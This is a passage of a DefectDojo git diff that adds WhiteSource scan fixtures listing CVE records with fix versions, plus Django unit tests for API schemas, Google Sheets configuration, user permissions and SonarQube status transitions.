at:\n\nhttps://rhn.redhat.com/errata/RHSA-2014-1162.html\nhttps://rhn.redhat.com/errata/RHSA-2014-1163.html\nhttps://rhn.redhat.com/errata/RHSA-2014-2019.html\nhttps://rhn.redhat.com/errata/RHSA-2014-2020.html", + "message":"Red Hat JBoss Certificate Validation Flaw Lets Remote Users Spoof SSL Servers", + "extraData":"key\u003d1030812" + }, + { + "vulnerability":"CVE-2014-3577", + "type":"CHANGE_FILES", + "origin":"GITHUB_COMMIT", + "url":"https://github.com/apache/httpcomponents-client/commit/6e14fc146a66e0f3eb362f45f95d1a58ee18886a", + "fixResolution":"Replace or update the following files: AbstractVerifier.java, TestHostnameVerifier.java", + "date":"2012-11-20 00:00:00", + "message":"Fixed CN extraction from DN of X500 principal\n\ngit-svn-id: https://svn.apache.org/repos/asf/httpcomponents/httpclient/trunk@1411702 13f79535-47bb-0310-9956-ffa450edef68", + "extraData":"key\u003d6e14fc1\u0026committerName\u003dok2c\u0026committerUrl\u003dhttps://github.com/ok2c\u0026committerAvatar\u003dhttps://avatars0.githubusercontent.com/u/235972?v\u003d4" + } + ] + }, + { + "name":"CVE-2019-9658", + "type":"CVE", + "severity":"medium", + "score":"5.0", + "cvss3_severity":"MEDIUM", + "cvss3_score":"5.3", + "publishDate":"2019-03-11", + "lastUpdatedDate":"2019-05-21", + "scoreMetadataVector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", + "url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2019-9658", + "description":"Checkstyle before 8.18 loads external DTDs by default.", + "project":"slack", + "product":"okhttp", + "cvss3Attributes":{ + "attackVector":"NETWORK", + "attackComplexity":"LOW", + "userInteraction":"NONE", + "privilegesRequired":"NONE", + "scope":"UNCHANGED", + "confidentialityImpact":"LOW", + "integrityImpact":"NONE", + "availabilityImpact":"NONE" + }, + "library":{ + "keyUuid":"31e26373-8f25-4c7c-9ada-63a688494afb", + "filename":"checkstyle-8.15.jar", + "name":"checkstyle", + "groupId":"com.puppycrawl.tools", + "artifactId":"checkstyle", + "version":"8.15", + "sha1":"8584d88c6aefcfb079adb8d102928b3eeb4de6ad", + "type":"MAVEN_ARTIFACT", + "description":"Checkstyle is a development tool to help programmers write Java code\n that adheres to a coding standard", + "architecture":"", + "languageVersion":"" + }, + "topFix":{ + "vulnerability":"CVE-2019-9658", + "type":"UPGRADE_VERSION", + "origin":"WHITESOURCE_EXPERT", + "url":"https://github.com/checkstyle/checkstyle/issues/6474", + "fixResolution":"Upgrade To Version checkstyle-8.18", + "date":"2019-03-11 05:29:01", + "message":"Upgrade To Version" + }, + "allFixes":[ + { + "vulnerability":"CVE-2019-9658", + "type":"UPGRADE_VERSION", + "origin":"WHITESOURCE_EXPERT", + "url":"https://github.com/checkstyle/checkstyle/issues/6474", + "fixResolution":"Upgrade To Version checkstyle-8.18", + "date":"2019-03-11 05:29:01", + "message":"Upgrade To Version" + }, + { + "vulnerability":"CVE-2019-9658", + "type":"CHANGE_FILES", + "origin":"GITHUB_COMMIT", + "url":"https://github.com/checkstyle/checkstyle/commit/180b4fe37a2249d4489d584505f2b7b3ab162ec6", + "fixResolution":"Replace or update the following files: XmlLoader.java, ConfigurationLoaderTest.java, config_reporting.xml, pmd.xml, pom.xml, XmlLoaderTest.java", + "date":"2019-02-25 00:00:00", + "message":"Issue #6474: disable external dtd load by default", + "extraData":"key\u003d180b4fe\u0026committerName\u003dromani\u0026committerUrl\u003dhttps://github.com/romani\u0026committerAvatar\u003dhttps://avatars3.githubusercontent.com/u/812984?v\u003d4" + } + ] + } + ] +} \ No newline at end of file diff --git a/unittests/scans/whitesource_sample/okhttp_no_vuln.json b/unittests/scans/whitesource_sample/okhttp_no_vuln.json new file mode 100644 index 00000000000..831bf814c0b --- /dev/null +++ b/unittests/scans/whitesource_sample/okhttp_no_vuln.json @@ -0,0 +1,5 @@ +{ + "vulnerabilities":[ + + ] +} \ No newline at end of file diff --git a/unittests/scans/whitesource_sample/okhttp_one_vuln.json b/unittests/scans/whitesource_sample/okhttp_one_vuln.json new file mode 100644 index 00000000000..f9903baae70 --- /dev/null +++ b/unittests/scans/whitesource_sample/okhttp_one_vuln.json @@ -0,0 +1,29 @@ +{ + "vulnerabilities":[ + { + "name":"WS-2009-0001", + "type":"WS", + "severity":"low", + "score":"0.0", + "publishDate":"2007-10-07", + "lastUpdatedDate":"2009-08-06", + "url":"https://issues.apache.org/jira/browse/CODEC-55", + "description":"Not all \"business\" method implementations of public API in Apache Commons Codec 1.x are thread safe, which might disclose the wrong data or allow an attacker to change non-private fields.\n\nUpdated 2018-10-07 - an additional review by WhiteSource research team could not indicate on a clear security vulnerability", + "project":"okhttp", + "product":"okhttp", + "library":{ + "keyUuid":"9aa14ac7-e415-4ed5-be35-bd2957fd7fd2", + "filename":"commons-codec-1.3.jar", + "name":"Codec", + "groupId":"commons-codec", + "artifactId":"commons-codec", + "version":"1.3", + "sha1":"fd32786786e2adb664d5ecc965da47629dca14ba", + "type":"MAVEN_ARTIFACT", + "description":"The codec package contains simple encoder and decoders for\n various formats such as Base64 and Hexadecimal. In addition to these\n widely used encoders and decoders, the codec package also maintains a\n collection of phonetic encoding utilities.", + "architecture":"", + "languageVersion":"" + } + } + ] +} \ No newline at end of file diff --git a/unittests/test_apiv2_methods.py b/unittests/test_apiv2_methods.py new file mode 100644 index 00000000000..20530e8dab8 --- /dev/null +++ b/unittests/test_apiv2_methods.py @@ -0,0 +1,31 @@ +from dojo.urls import v2_api +from .dojo_test_case import DojoTestCase +from .test_rest_framework import get_open_api3_json_schema, BASE_API_URL + + +class ApiEndpointMethods(DojoTestCase): + fixtures = ['dojo_testdata.json'] + + def setUp(self): + super().setUp() + + self.schema = get_open_api3_json_schema() + + self.registry = v2_api.registry + + def test_is_defined(self): + + for reg, _, _ in sorted(self.registry): + if reg in ['import-scan', 'reimport-scan', 'notes', 'system_settings', 'roles', 'import-languages', 'endpoint_meta_import', 'test_types', 'configuration_permissions']: + continue + + for method in ['get', 'post']: + self.assertIsNotNone(self.schema["paths"][BASE_API_URL + '/' + reg + '/'].get(method), + "Endpoint: {}, Method: {}".format(reg, method)) + + for method in ['get', 'put', 'patch', 'delete']: + self.assertIsNotNone(self.schema["paths"][BASE_API_URL + '/' + reg + '/{id}/'].get(method), + "Endpoint: {}, Method: {}".format(reg, method)) + + self.assertIsNotNone(self.schema["paths"].get(BASE_API_URL + '/' + reg + '/{id}/delete_preview/', {}).get('get'), + "Endpoint: {}, Method: get - delete_preview".format(reg)) diff --git a/unittests/test_google_sheets_configuration.py b/unittests/test_google_sheets_configuration.py new file mode 100644 index 00000000000..ef86c274355 --- /dev/null +++ b/unittests/test_google_sheets_configuration.py @@ -0,0 +1,67 @@ +import os +from .dojo_test_case import DojoVCRTestCase +from .dojo_test_case import DojoTestCase +import logging +from vcr import VCR +from django.urls import reverse + + +logger = logging.getLogger(__name__) + + +class GoogleSheetsConfigTestApi(DojoVCRTestCase): + fixtures = ['dojo_testdata.json'] + + def __init__(self, *args, **kwargs): + DojoTestCase.__init__(self, *args, **kwargs) + + def assert_cassette_played(self): + if True: # set to True when committing. set to False when recording new test cassettes + self.assertTrue(self.cassette.all_played) + + def _get_vcr(self, **kwargs): + my_vcr = super(GoogleSheetsConfigTestApi, self)._get_vcr(**kwargs) + my_vcr.record_mode = 'once' + my_vcr.path_transformer = VCR.ensure_suffix('.yaml') + my_vcr.cassette_library_dir = os.path.dirname(os.path.abspath(__file__)) + '/vcr/google_sheets/' + return my_vcr + + def setUp(self): + super().setUp() + self.client.force_login(self.get_test_admin()) + + def test_config_google_sheets(self): + # To regenerate the cassette, use an actual credentials json file + with open('tests/test-dojo-sheets-NONEXISTING.json', 'rb') as f: + data = {} + # fail on purpose to get all the fields dynamically + response = self.client.post(reverse('configure_google_sheets'), data, follow=True) + form = response.context['form'] + self.assertEqual(form.is_valid(), False) + + for field in form: + # do not consider the "protect" checkbox, leave them as is + if 'Protect' in field.html_name: + continue + # Select Hide (0) by default + data.update({field.html_name: 0}) + + data.update({ + # To regenerate the cassette, use non-revoked credentials + # The json file is a real json file, but the account is disabled and the key deleted + # The VCR does not recognize the stream otherwise, and will not match causing tests to fail :sob: :shrug: + # due to the bearer token having to remain in the vcr yaml + 'email_address': 'test-dojo-sheets@test-dojo-sheets.iam.gserviceaccount.com', + # needs to match ID in the cassette + 'drive_folder_ID': 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX', + 'enable_service': 'on', + 'cred_file': f + }) + # force use of specific submit button + data.update({ + 'update': 'Submit' + }) + + response = self.client.post(reverse('configure_google_sheets'), data, follow=True) + self.assertContains(response, "successfully") + self.assert_cassette_played() diff --git a/unittests/test_pipeline.py b/unittests/test_pipeline.py new file mode 100644 index 00000000000..60dae36f2e5 --- /dev/null +++ b/unittests/test_pipeline.py @@ -0,0 +1,38 @@ +from django.test.utils import override_settings +from .dojo_test_case import DojoTestCase +from unittest.mock import patch +from dojo.models import Dojo_User, System_Settings +from dojo.pipeline import modify_permissions + + +class TestPipeline(DojoTestCase): + + @classmethod + def setUpTestData(cls): + cls.user = Dojo_User() + cls.user.id = 1 + + cls.system_settings_email = System_Settings() + cls.system_settings_email.staff_user_email_pattern = '.*@example.com' + + @patch('dojo.models.System_Settings.objects') + @override_settings(FEATURE_CONFIGURATION_AUTHORIZATION=False) + def test_modify_permissions_user_is_staff(self, mock): + mock.get.return_value = self.system_settings_email + + self.user.email = 'user.user@example.com' + self.user.is_staff = False + modify_permissions(backend=None, uid=None, user=self.user, is_new=True) + + self.assertTrue(self.user.is_staff) + + @patch('dojo.models.System_Settings.objects') + @override_settings(FEATURE_CONFIGURATION_AUTHORIZATION=False) + def test_modify_permissions_user_not_staff(self, mock): + mock.get.return_value = self.system_settings_email + + self.user.email = 'user.user@partner.example.com' + self.user.is_staff = False + modify_permissions(backend=None, uid=None, user=self.user, is_new=True) + + self.assertFalse(self.user.is_staff) diff --git a/unittests/test_sonarqube_updater.py b/unittests/test_sonarqube_updater.py new file mode 100644 index 00000000000..d8c46450cdb --- /dev/null +++ b/unittests/test_sonarqube_updater.py @@ -0,0 +1,96 @@ +from .dojo_test_case import DojoTestCase +from dojo.models import Tool_Configuration, Tool_Type +from dojo.tools.sonarqube_api.updater import SonarQubeApiUpdater + + +class TestSonarQubeApiUpdater(DojoTestCase): + + def setUp(self): + tool_type = Tool_Type.objects.create(name='SonarQube') + Tool_Configuration.objects.create(name='SonarQube', tool_type=tool_type, authentication_type="API") + + self.updater = SonarQubeApiUpdater() + + def test_transitions_for_sonarqube_from_open_1(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('OPEN', 'CONFIRMED'), + ['confirm'] + ) + + def test_transitions_for_sonarqube_from_open_2(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('OPEN', 'RESOLVED / FIXED'), + ['resolve'] + ) + + def test_transitions_for_sonarqube_from_reopened_1(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('REOPENED', 'RESOLVED / FIXED'), + ['resolve'] + ) + + def test_transitions_for_sonarqube_from_reopened_2(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('REOPENED', 'CONFIRMED'), + ['confirm'] + ) + + def test_transitions_for_sonarqube_from_resolved_1(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('RESOLVED / FIXED', 'CONFIRMED'), + ['reopen', 'confirm'] + ) + + def test_transitions_for_sonarqube_from_resolved_2(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('RESOLVED / FIXED', 'RESOLVED / FALSE-POSITIVE'), + ['reopen', 'falsepositive'] + ) + + def test_transitions_for_sonarqube_from_resolved_3(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('RESOLVED / FIXED', 'RESOLVED / WONTFIX'), + ['reopen', 'wontfix'] + ) + + def test_transitions_for_sonarqube_fake_target_origin(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('FAKE_STATUS', 'RESOLVED / FIXED'), + None + ) + + def test_transitions_for_sonarqube_fake_target_status(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('RESOLVED / FIXED', 'FAKE_STATUS'), + None + ) + + def test_transitions_for_sonarqube_from_confirmed_1(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('CONFIRMED', 'REOPENED'), + ['unconfirm'] + ) + + def test_transitions_for_sonarqube_from_confirmed_2(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('CONFIRMED', 'RESOLVED / FIXED'), + ['resolve'] + ) + + def test_transitions_for_open_reopen_status_1(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('OPEN', 'REOPENED'), + None + ) + + def test_transitions_for_open_reopen_status_2(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('REOPENED', 'OPEN'), + None + ) + + def test_transitions_for_open_reopen_status_3(self): + self.assertEquals( + self.updater.get_sonarqube_required_transitions_for('REOPENED', 'REOPENED'), + None + ) diff --git a/unittests/test_swagger_schema.py b/unittests/test_swagger_schema.py new file mode 100644 index 00000000000..af992916aeb --- /dev/null +++ b/unittests/test_swagger_schema.py @@ -0,0 +1,820 @@ +from django.test import tag +from rest_framework.test import APIRequestFactory +from rest_framework.views import APIView +from rest_framework.test import APITestCase, force_authenticate, APIClient +from rest_framework.mixins import \ + RetrieveModelMixin, ListModelMixin, CreateModelMixin, UpdateModelMixin +from rest_framework import status +from drf_yasg.generators import OpenAPISchemaGenerator +from drf_yasg.openapi import Info, SchemaRef +from drf_yasg.openapi import \ + TYPE_ARRAY, TYPE_BOOLEAN, TYPE_INTEGER, TYPE_NUMBER, TYPE_OBJECT, TYPE_STRING +from collections import OrderedDict + +from dojo.api_v2.views import \ + DevelopmentEnvironmentViewSet, EndpointStatusViewSet, EndPointViewSet, \ + EngagementViewSet, FindingTemplatesViewSet, FindingViewSet, \ + JiraInstanceViewSet, DojoMetaViewSet, NoteTypeViewSet, NotesViewSet, \ + ProductTypeViewSet, ProductViewSet, RegulationsViewSet, \ + SonarqubeIssueViewSet, ProductAPIScanConfigurationViewSet, \ + SonarqubeIssueTransitionViewSet, StubFindingsViewSet, SystemSettingsViewSet, \ + TestTypesViewSet, TestsViewSet, ToolConfigurationsViewSet, ToolProductSettingsViewSet, \ + ToolTypesViewSet, UsersViewSet, JiraIssuesViewSet, JiraProjectViewSet, AppAnalysisViewSet, \ + LanguageTypeViewSet, LanguageViewSet + +from dojo.models import \ + Development_Environment, Endpoint_Status, Endpoint, Engagement, Finding_Template, \ + Finding, JIRA_Instance, JIRA_Issue, DojoMeta, Note_Type, Notes, Product_Type, Product, Regulation, \ + Sonarqube_Issue, Product_API_Scan_Configuration, Sonarqube_Issue_Transition, \ + Stub_Finding, System_Settings, Test_Type, Test, Tool_Configuration, Tool_Product_Settings, \ + Tool_Type, Dojo_User, JIRA_Project, App_Analysis, Language_Type, Languages + +from dojo.api_v2.serializers import \ + DevelopmentEnvironmentSerializer, EndpointStatusSerializer, EndpointSerializer, \ + EngagementSerializer, FindingTemplateSerializer, FindingSerializer, \ + JIRAInstanceSerializer, JIRAIssueSerializer, JIRAProjectSerializer, MetaSerializer, NoteTypeSerializer, \ + ProductSerializer, RegulationSerializer, \ + SonarqubeIssueSerializer, ProductAPIScanConfigurationSerializer, SonarqubeIssueTransitionSerializer, \ + StubFindingSerializer, SystemSettingsSerializer, TestTypeSerializer, TestSerializer, ToolConfigurationSerializer, \ + ToolProductSettingsSerializer, ToolTypeSerializer, UserSerializer, NoteSerializer, ProductTypeSerializer, \ + AppAnalysisSerializer, LanguageTypeSerializer, LanguageSerializer + +SWAGGER_SCHEMA_GENERATOR = OpenAPISchemaGenerator(Info("defectdojo", "v2")) +BASE_API_URL = "/api/v2" + + +def testIsBroken(method): + return tag("broken")(method) + + +def skipIfNotSubclass(baseclass): + def decorate(f): + def wrapper(self, *args, **kwargs): + if not issubclass(self.viewset, baseclass): + self.skipTest('This view is not %s' % baseclass) + else: + f(self, *args, **kwargs) + return wrapper + return decorate + + +def check_response_valid(expected_code, response): + def _data_to_str(response): + if hasattr(response, "data"): + return response.data + return None + + assert response.status_code == expected_code, \ + f"Response invalid, returned with code {response.status_code}\nResponse Data:\n{_data_to_str(response)}" + + +def format_url(path): + return f"{BASE_API_URL}{path}" + + +class SchemaChecker(): + def __init__(self, definitions): + self._prefix = [] + self._has_failed = False + self._definitions = definitions + self._errors = [] + + def _register_error(self, error): + self._errors += [error] + + def _check_or_fail(self, condition, message): + if not condition: + self._has_failed = True + self._register_error(message) + + def _get_prefix(self): + return '#'.join(self._prefix) + + def _push_prefix(self, prefix): + self._prefix += [prefix] + + def _pop_prefix(self): + self._prefix = self._prefix if len(self._prefix) == 0 else self._prefix[:-1] + + def _resolve_if_ref(self, schema): + if type(schema) is not SchemaRef: + return schema + + ref_name = schema["$ref"] + ref_name = ref_name[ref_name.rfind("/") + 1:] + return self._definitions[ref_name] + + def _check_has_required_fields(self, required_fields, obj): + for required_field in required_fields: + # passwords are writeOnly, but this is not supported by Swagger / OpenAPIv2 + if required_field != 'password': + field = f"{self._get_prefix()}#{required_field}" + self._check_or_fail(obj is not None and required_field in obj, f"{field} is required but was not returned") + + def _check_type(self, schema, obj): + schema_type = schema["type"] + is_nullable = schema.get("x-nullable", False) or schema.get("readOnly", False) + + def _check_helper(check): + self._check_or_fail(check, f"{self._get_prefix()} should be of type {schema_type} but value was of type {type(obj)}") + + if obj is None: + self._check_or_fail(is_nullable, f"{self._get_prefix()} is not nullable yet the value returned was null") + elif schema_type is TYPE_BOOLEAN: + _check_helper(isinstance(obj, bool)) + elif schema_type is TYPE_INTEGER: + _check_helper(isinstance(obj, int)) + elif schema_type is TYPE_NUMBER: + _check_helper(obj.isdecimal()) + elif schema_type is TYPE_ARRAY: + _check_helper(isinstance(obj, list)) + elif schema_type is TYPE_OBJECT: + _check_helper(isinstance(obj, OrderedDict) or isinstance(obj, dict)) + elif schema_type is TYPE_STRING: + _check_helper(isinstance(obj, str)) + else: + # Default case + _check_helper(False) + + def _with_prefix(self, prefix, callable, *args): + self._push_prefix(prefix) + callable(*args) + self._pop_prefix() + + def check(self, schema, obj): + def _check(schema, obj): + schema = self._resolve_if_ref(schema) + self._check_type(schema, obj) + + required_fields = schema.get("required", []) + self._check_has_required_fields(required_fields, obj) + + if obj is None: + return + + properties = schema.get("properties", None) + if properties is not None: + for name, prop in properties.items(): + # print('property: ', name) + # print('obj ', obj) + obj_child = obj.get(name, None) + if obj_child is not None: + self._with_prefix(name, _check, prop, obj_child) + + for child_name in obj.keys(): + # TODO prefetch mixins not picked up by spectcular? + if child_name not in ['prefetch']: + if not properties or child_name not in properties.keys(): + self._has_failed = True + self._register_error(f'unexpected property "{child_name}" found') + + additional_properties = schema.get("additionalProperties", None) + if additional_properties is not None: + for name, obj_child in obj.items(): + self._with_prefix(f"additionalProp<{name}>", _check, additional_properties, obj_child) + + if schema["type"] is TYPE_ARRAY: + items_schema = schema["items"] + for index in range(len(obj)): + self._with_prefix(f"item{index}", _check, items_schema, obj[index]) + + self._has_failed = False + self._errors = [] + self._prefix = [] + _check(schema, obj) + assert not self._has_failed, "\n" + '\n'.join(self._errors) + "\nFailed with " + str(len(self._errors)) + " errors" + + +class BaseClass(): + class SchemaTest(APITestCase): + fixtures = ['dojo_testdata.json'] + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewset = None + self.viewname = None + self.model = None + self.serializer = None + self.field_transformers = dict() + + def setUp(self): + super().setUp() + testuser = Dojo_User.objects.get(username='admin') + + factory = APIRequestFactory() + request = factory.get('/') + force_authenticate(request, user=testuser) + request = APIView().initialize_request(request) + + self.schema = SWAGGER_SCHEMA_GENERATOR.get_schema(request, public=True) + self.client = APIClient() + self.client.force_authenticate(user=testuser) + + def check_schema(self, schema, obj): + schema_checker = SchemaChecker(self.schema["definitions"]) + # print(vars(schema_checker)) + schema_checker.check(schema, obj) + + def get_valid_object_id(self): + response = self.client.get(format_url(f"/{self.viewname}/")) + check_response_valid(status.HTTP_200_OK, response) + if len(response.data["results"]) == 0: + return None + + return response.data["results"][0].get('id', None) + + def get_endpoint_schema(self, path, method): + paths = self.schema["paths"] + methods = paths.get(path, None) + assert methods is not None, f"{path} not found in {[path for path in paths.keys()]}" + + endpoint = methods.get(method, None) + assert endpoint is not None, f"Method {method} not found in {[method for method in methods.keys()]}" + + return endpoint + + def construct_response_data(self, obj_id): + obj = self.model.objects.get(id=obj_id) + request = APIView().initialize_request(APIRequestFactory().request()) + serialized_obj = self.serializer(context={"request": request}).to_representation(obj) + + for name, transformer in self.field_transformers.items(): + serialized_obj[name] = transformer(serialized_obj[name]) + + return serialized_obj + + @skipIfNotSubclass(ListModelMixin) + def test_list_endpoint(self, extra_args=None): + endpoints = self.schema["paths"][f"/{self.viewname}/"] + response = self.client.get(format_url(f"/{self.viewname}/"), extra_args) + check_response_valid(status.HTTP_200_OK, response) + + schema = endpoints['get']['responses']['200']['schema'] + obj = response.data + + self.check_schema(schema, obj) + + @skipIfNotSubclass(RetrieveModelMixin) + def test_retrieve_endpoint(self, extra_args=None): + endpoints = self.schema["paths"][f"/{self.viewname}/{{id}}/"] + response = self.client.get(format_url(f"/{self.viewname}/")) + check_response_valid(status.HTTP_200_OK, response) + ids = [obj['id'] for obj in response.data["results"]] + + schema = endpoints['get']['responses']['200']['schema'] + for id in ids: + print('id:', id) + response = self.client.get(format_url(f"/{self.viewname}/{id}/"), extra_args) + print('response type:', type(response)) + print('response data:', response.data) + check_response_valid(status.HTTP_200_OK, response) + obj = response.data + self.check_schema(schema, obj) + + @skipIfNotSubclass(UpdateModelMixin) + def test_patch_endpoint(self, extra_args=None): + operation = self.schema["paths"][f"/{self.viewname}/{{id}}/"]["patch"] + + id = self.get_valid_object_id() + if id is None: + self.skipTest("No data exists to test endpoint") + + data = self.construct_response_data(id) + + schema = operation['responses']['200']['schema'] + response = self.client.patch(format_url(f"/{self.viewname}/{id}/"), data, format='json') + check_response_valid(status.HTTP_200_OK, response) + + obj = response.data + self.check_schema(schema, obj) + + @skipIfNotSubclass(UpdateModelMixin) + def test_put_endpoint(self, extra_data={}, extra_args=None): + operation = self.schema["paths"][f"/{self.viewname}/{{id}}/"]['put'] + + id = self.get_valid_object_id() + if id is None: + self.skipTest("No data exists to test endpoint") + + data = self.construct_response_data(id) + data.update(extra_data) + + schema = operation['responses']['200']['schema'] + response = self.client.put(format_url(f"/{self.viewname}/{id}/"), data, format='json') + check_response_valid(status.HTTP_200_OK, response) + + obj = response.data + self.check_schema(schema, obj) + + @skipIfNotSubclass(CreateModelMixin) + def test_post_endpoint(self, extra_data=[], extra_args=None): + operation = self.schema["paths"][f"/{self.viewname}/"]["post"] + + id = self.get_valid_object_id() + if id is None: + self.skipTest("No data exists to test endpoint") + + data = self.construct_response_data(id) + data.update(extra_data) + + print('data:', data) + + schema = operation['responses']['201']['schema'] + response = self.client.post(format_url(f"/{self.viewname}/"), data, format='json') + check_response_valid(status.HTTP_201_CREATED, response) + + print('response.data:', response.data) + + obj = response.data + self.check_schema(schema, obj) + + +class DevelopmentEnvironmentTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "development_environments" + self.viewset = DevelopmentEnvironmentViewSet + self.model = Development_Environment + self.serializer = DevelopmentEnvironmentSerializer + + +# Test will only work when FEATURE_AUTHENTICATION_V2 is the default +# class DojoGroupTest(BaseClass.SchemaTest): +# def __init__(self, *args, **kwargs): +# super().__init__(*args, **kwargs) +# self.viewname = "group" +# self.viewset = DojoGroupViewSet +# self.model = Dojo_Group +# self.serializer = DojoGroupSerializer + + +class EndpointStatusTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "endpoint_status" + self.viewset = EndpointStatusViewSet + self.model = Endpoint_Status + self.serializer = EndpointStatusSerializer + + # We can not simulate creating of the endpoint-finding relation with the same parameters as existing one. We will use another finding for this case + def test_post_endpoint(self): + super().test_post_endpoint(extra_data={"finding": "3"}) + + +class EndpointTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "endpoints" + self.viewset = EndPointViewSet + self.model = Endpoint + self.serializer = EndpointSerializer + self.field_transformers = { + "path": lambda v: (v if v else '') + "transformed/" + } + + +class EngagementTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "engagements" + self.viewset = EngagementViewSet + self.model = Engagement + self.serializer = EngagementSerializer + + # @testIsBroken + # fixed + def test_accept_risks(self): + operation = self.get_endpoint_schema("/engagements/{id}/accept_risks/", "post") + schema = operation['responses']['201']['schema'] + print(schema) + id = self.get_valid_object_id() + if id is None: + self.skipTest("No data exists to test endpoint") + + data = [ + { + "vulnerability_id": 1, + "justification": "test", + "accepted_by": "2" + } + ] + + response = self.client.post(format_url(f"/engagements/{id}/accept_risks/"), data, format='json') + check_response_valid(201, response) + print('response.data') + # print(vars(response)) + print(response.content) + obj = response.data + self.check_schema(schema, obj) + + # fixed + def test_notes_read(self): + operation = self.get_endpoint_schema("/engagements/{id}/notes/", "get") + schema = operation['responses']['200']['schema'] + id = self.get_valid_object_id() + if id is None: + self.skipTest("No data exists to test endpoint") + + response = self.client.get(format_url(f"/engagements/{id}/notes/")) + check_response_valid(200, response) + obj = response.data + self.check_schema(schema, obj) + + # fixed + def test_notes_create(self): + operation = self.get_endpoint_schema("/engagements/{id}/notes/", "post") + schema = operation['responses']['201']['schema'] + id = self.get_valid_object_id() + if id is None: + self.skipTest("No data exists to test endpoint") + + data = { + "entry": "test", + "author": 2, + } + + response = self.client.post(format_url(f"/engagements/{id}/notes/"), data, format='json') + check_response_valid(201, response) + obj = response.data + self.check_schema(schema, obj) + + +class FindingTemplateTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "finding_templates" + self.viewset = FindingTemplatesViewSet + self.model = Finding_Template + self.serializer = FindingTemplateSerializer + + # fixed + def test_post_endpoint(self): + super().test_post_endpoint() + + # fixed + def test_patch_endpoint(self): + super().test_patch_endpoint() + + # fixed + def test_put_endpoint(self): + super().test_put_endpoint() + + +class FindingTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "findings" + self.viewset = FindingViewSet + self.model = Finding + self.serializer = FindingSerializer + + # fixed + def test_list_endpoint(self): + super().test_list_endpoint({ + "related_fields": True + }) + + # fixed + def test_patch_endpoint(self): + super().test_patch_endpoint() + + # fixed + def test_put_endpoint(self): + super().test_put_endpoint() + + # fixed + def test_retrieve_endpoint(self): + super().test_retrieve_endpoint({ + "related_fields": True + }) + + +class JiraInstanceTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "jira_instances" + self.viewset = JiraInstanceViewSet + self.model = JIRA_Instance + self.serializer = JIRAInstanceSerializer + + # fixed + def test_list_endpoint(self): + super().test_list_endpoint() + + # fixed + def test_patch_endpoint(self): + super().test_patch_endpoint() + + # fixed + def test_put_endpoint(self): + super().test_put_endpoint(extra_data={"password": "12345"}) + + # fixed + def test_retrieve_endpoint(self): + super().test_retrieve_endpoint() + + # fixed + def test_post_endpoint(self): + super().test_post_endpoint(extra_data={"password": "12345"}) + + +class JiraFindingMappingsTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "jira_finding_mappings" + self.viewset = JiraIssuesViewSet + self.model = JIRA_Issue + self.serializer = JIRAIssueSerializer + self.field_transformers = { + "finding": lambda v: 3, + } + + +class JiraProjectTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "jira_projects" + self.viewset = JiraProjectViewSet + self.model = JIRA_Project + self.serializer = JIRAProjectSerializer + + +class MetadataTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "metadata" + self.viewset = DojoMetaViewSet + self.model = DojoMeta + self.serializer = MetaSerializer + + +class NoteTypeTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "note_type" + self.viewset = NoteTypeViewSet + self.model = Note_Type + self.serializer = NoteTypeSerializer + self.field_transformers = { + "name": lambda v: v + "_new" + } + + +class NoteTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "notes" + self.viewset = NotesViewSet + self.model = Notes + self.serializer = NoteSerializer + + +class ProductTypeTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "product_types" + self.viewset = ProductTypeViewSet + self.model = Product_Type + self.serializer = ProductTypeSerializer + self.field_transformers = { + "name": lambda v: v + "_new" + } + + +# Test will only work when FEATURE_AUTHENTICATION_V2 is the default +# class ProductTypeMemberTest(BaseClass.SchemaTest): +# def __init__(self, *args, **kwargs): +# super().__init__(*args, **kwargs) +# self.viewname = "product_type_members" +# self.viewset = ProductTypeMemberViewSet +# self.model = Product_Type_Member +# self.serializer = ProductTypeMemberSerializer + + +# Test will only work when FEATURE_AUTHENTICATION_V2 is the default +# class ProductTypeGroupTest(BaseClass.SchemaTest): +# def __init__(self, *args, **kwargs): +# super().__init__(*args, **kwargs) +# self.viewname = "product_type_groups" +# self.viewset = ProductTypeGroupViewSet +# self.model = Product_Type_Group +# self.serializer = ProductTypeGroupSerializer + + +class ProductTest(BaseClass.SchemaTest): + def __init__(self, 